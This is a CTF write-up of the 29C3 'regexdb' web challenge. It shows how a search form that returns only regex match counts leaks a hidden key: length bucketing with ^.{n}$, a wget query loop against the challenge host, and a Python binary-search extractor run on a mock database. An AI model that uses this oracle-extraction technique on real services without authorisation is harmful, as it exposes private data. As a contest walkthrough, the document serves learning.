29c3ctf web100 regexdb writeup
2012-12-30 18:28
I posted the original write-up on the blue-lotus team's site:
But I'll keep a copy here as a memento~~~
Problem Link: regexdb
**Description** Ever played Googlewhack? Well, this is a bit [easier][2] and gives you more power, enjoy.
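Quote from the Google shared doc:
The hint given by the challenge is googlewhack, which means a query that returns exactly one result. First, testing shows that all input has to be placed between -- . For example: input -- returns 18. Input - . - returns: results: 1: 29C3_NotAKey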
Some useful information:
Query language “analysis” (Jay):
- . is single character
- * is wildcard
- | is OR operator
- ^ is BEGINNING OF STRING operator
Examples
- ** - 18 results (total in db)
- *29C3* - 12 results
- *^29C3* - 6 results
- *.{40}* - 3 results (all results which are 40 chars long)

**!!This is a perl regular expression engine!!**
The first step is to sort all 18 results by length; a simple script helps:
wget -q -O - --post-data="input=-$1-" "http://94.45.252.233/" | grep Results
Use the regex
^.{$length}$
to separate all the entries by length.
Then we can get almost all the wrong answers:
29C3_ Key: None Key: 29C3_ 29C3_Wrong Hello World! 29C3_NoBadOne 29C3_____NO_____ Wrong: 29C3_Wrong K3y: 29C3_AlsoBad 29C3_ImSimplyWrong 23 23 23 23 23 23 23 23 This one is unrelated... Key: 29C3_AnotherOneWhichIsWrong 29C3_NotAKey <- this one is not a key 42 42 42 42 42 42 42 42 42 42 42 42 42 42 Key: 29C3_?? length 40 Key: 29C3_?? length 40
So we know the answer is one of the last 2 keys.
(After getting the flag, we know that they are both the keys.)
Construct the regular expression
^.{$left}[$query_set].{$right}$
Here we need $left+$right to equal 39 and have to find the unique $query_set; that set is the answer for that position.
We can simply use escape syntax to do this. The engine does not support the [a-zA-Z] range syntax,
so we have to write out all the query characters.
Start from
$query="\1\2...\7f" and check whether the result includes the character '2'.
Binary search here is a better choice.
After all of the above, we get the answer:
Key: 29C3_Well.This/Is#Not+The|Wrong?Key
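
The two steps above (length bucketing with ^.{n}$, then per-position set queries narrowed by binary search), as an added Python example that is not part of the original write-up. It runs against a local, constructed `Oracle` class and `DB` list (both hypothetical), assumes only one row has the target length, and shows that a match count alone leaks the value in at most 7 queries per character.

```python
import re

# Constructed stand-in rows; not the challenge's real database.
DB = ["29C3_Wrong", "Hello World!", "Key: 29C3_Constructed/Sample#Value"]
ALPHABET = [chr(c) for c in range(0x20, 0x7F)]  # printable ASCII


class Oracle:
    """Hypothetical search form that reveals only how many rows match."""

    def __init__(self, rows):
        self.rows, self.queries = rows, 0

    def count(self, pattern):
        self.queries += 1
        return sum(1 for row in self.rows if re.search(pattern, row))


def char_class(chars):
    # No a-z ranges: list every candidate explicitly, escaped.
    return "[" + "".join(re.escape(c) for c in chars) + "]"


def lengths(oracle, max_len=64):
    # Step 1: ^.{n}$ buckets the rows by length -> {length: row count}.
    found = {}
    for n in range(1, max_len + 1):
        hits = oracle.count("^.{%d}$" % n)
        if hits:
            found[n] = hits
    return found


def extract(oracle, length):
    # Step 2: ^.{left}[set].{right}$ with left + right == length - 1.
    # Assumes exactly one row has this length; halve the set per query.
    out = []
    for left in range(length):
        cand = ALPHABET
        while len(cand) > 1:
            half = cand[: len(cand) // 2]
            pat = "^.{%d}%s.{%d}$" % (left, char_class(half), length - 1 - left)
            cand = half if oracle.count(pat) else cand[len(half):]
        out.append(cand[0])
    return "".join(out)


if __name__ == "__main__":
    oracle = Oracle(DB)
    target = max(lengths(oracle))
    print(extract(oracle, target), oracle.queries)
```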